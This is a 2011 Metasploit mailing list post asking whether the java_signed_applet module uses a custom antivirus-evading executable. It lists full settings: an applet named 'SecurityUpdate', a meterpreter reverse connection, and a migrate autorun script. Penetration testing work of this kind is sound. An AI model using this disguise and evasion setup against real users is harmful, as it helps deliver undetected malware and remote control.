Metasploit mailing list archives
java_signed_applet
From: la zariguella <lazariguella () gmail com>
Date: Wed, 30 Nov 2011 20:40:02 -0200
Hi guys, i am trying to use a custom generated executable with the java_signed_applet exploit. For this i am using the advanced option EXE::Custom. I test the generated exe payload alone, on the target system, and the AV don't detect my file. So , is really metasploit using my custom exe to generate the jar file or i am missing something here? Here are my settings: Name Value ---- ----- APPLETNAME SecurityUpdate AutoLoadStdapi true AutoRunScript /pentest/exploits/framework3/scripts/meterpreter/migrate.rb -k -f AutoSystemInfo true CERTCN SiteLoader DisablePayloadHandler false EXE::Custom /pentest/exploits/framework3/custom.exe EXE::FallBack false EXE::Inject false EXE::OldMethod false EXITFUNC process EnableContextEncoding false EnableUnicodeEncoding true HTML::base64 none HTML::javascript::escape 0 HTML::unicode none HTTP::chunked false HTTP::compression none HTTP::header_folding false HTTP::junk_headers false HTTP::server_name Apache InitialAutoRunScript LHOST 192.168.1.10 LPORT 4444 ReverseConnectRetries 5 SRVHOST 192.168.1.10 SRVPORT 80 SSL false SSLVersion SSL3 TARGET 1 TCP::max_send_size 0 TCP::send_delay 0 URIPATH / VERBOSE true I am using svn Metasploit 4.2.0-dev r14325 updated today (2011.11.30) on Ubuntu 11.04 system Thanks for your help!
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- java_signed_applet la zariguella (Nov 30)